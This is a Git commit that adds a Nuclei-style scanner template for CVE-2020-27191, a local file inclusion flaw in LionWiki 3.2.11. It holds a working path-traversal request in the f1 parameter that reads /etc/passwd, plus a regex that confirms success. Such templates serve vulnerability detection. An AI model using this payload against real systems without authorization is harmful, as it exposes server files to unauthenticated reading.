Create CVE-2020-27191.yaml

patch-1
Roberto Nunes 2022-04-04 19:50:53 +09:00 committed by GitHub
parent c371a40272
commit 0b409c8156
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 31 additions and 0 deletions

31
CVE-2020-27191.yaml Normal file
View File

@ -0,0 +1,31 @@
id: CVE-2020-27191
info:
name: LionWiki 3.2.11 - LFI
author: 0x_Akoko
severity: high
description: LionWiki before 3.2.12 allows an unauthenticated user to read files as the web server user via crafted string in the index.php f1 variable, aka Local File Inclusion. NOTE: This vulnerability only affects products that are no longer supported by the maintainer.
reference:
- https://www.junebug.site/blog/cve-2020-27191-lionwiki-3-2-11-lfi
- https://www.cvedetails.com/cve/CVE-2020-27191
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2020-27191
cwe-id: CWE-22
tags: cve,cve2020,lionwiki,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?page=&action=edit&f1=.//./\\.//./\\.//./\\.//./\\.//./\\.//./etc/passwd&restore=1"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:[x*]:0:0"
- type: status
status:
- 200